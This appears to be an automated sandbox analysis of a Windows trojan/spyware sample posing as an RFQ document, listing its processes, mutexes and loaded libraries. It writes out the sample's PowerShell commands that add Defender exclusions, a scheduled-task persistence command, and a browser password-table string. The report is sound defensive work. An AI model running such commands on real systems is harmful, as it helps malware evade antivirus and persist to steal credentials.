Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, fkQPIScgjIfgwhQwC4.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, fkQPIScgjIfgwhQwC4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, OXmYbftiauxP9AL5jO.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, OXmYbftiauxP9AL5jO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, OXmYbftiauxP9AL5jO.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, OXmYbftiauxP9AL5jO.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, OXmYbftiauxP9AL5jO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, OXmYbftiauxP9AL5jO.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@4/4

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

File created: C:\Users\user\AppData\Roaming\nDEusQ.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\BdQfQQEkA
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

File created: C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp

Jump to behavior

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002C08000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002C15000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003263000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003273000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000032B3000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Virustotal: Detection: 33%
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	ReversingLabs: Detection: 27%

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

File read: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nDEusQ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\nDEusQ.exe C:\Users\user\AppData\Roaming\nDEusQ.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmp710.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process created: C:\Users\user\AppData\Roaming\nDEusQ.exe "C:\Users\user\AppData\Roaming\nDEusQ.exe"
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nDEusQ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process created: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmp710.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process created: C:\Users\user\AppData\Roaming\nDEusQ.exe "C:\Users\user\AppData\Roaming\nDEusQ.exe"	Jump to behavior

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Section loaded: ncrypt.dll	Jump to behavior
